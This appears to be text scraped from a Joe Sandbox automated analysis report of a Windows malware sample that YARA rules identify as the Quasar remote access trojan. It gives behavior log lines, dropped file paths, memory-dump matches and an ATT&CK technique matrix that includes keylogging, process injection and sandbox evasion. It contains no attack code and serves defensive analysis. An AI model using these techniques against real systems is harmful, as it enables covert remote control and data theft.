Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\WCTVN\mmytljldrgl.exe	Queries volume information: C:\WCTVN\mmytljldrgl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Users\user\AppData\Roaming\SubDir\Client.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.SqlXml\v4.0_4.0.0.0__b77a5c561934e089\System.Data.SqlXml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Queries volume information: C:\Users\user\AppData\Roaming\SubDir\Client.exe VolumeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Code function: 0_2_00007FF7E7694C14 GetSystemTimeAsFileTime,

0_2_00007FF7E7694C14

Source: C:\WCTVN\mmytljldrgl.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Quasar RAT

Source: Yara match	File source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED

Remote Access Functionality

Yara detected Quasar RAT

Source: Yara match	File source: 24.0.mmytljldrgl.exe.450000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.2946566856.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2059375290.0000000000770000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.2051054943.0000000000452000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2118558871.000000001B2D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: mmytljldrgl.exe PID: 3156, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7328, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mmytljldrgl[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\WCTVN\mmytljldrgl.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	111 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 DLL Side-Loading	1 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	111 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	11 Process Injection	1 DLL Side-Loading	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	1 Masquerading	NTDS	131 Security Software Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	51 Virtualization/Sandbox Evasion	LSA Secrets	1 Process Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Process Injection	Cached Domain Credentials	51 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Hidden Files and Directories	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 System Network Configuration Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Quasar

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SecuriteInfo.com.Win64.MalwareX-gen.15932.4492.exe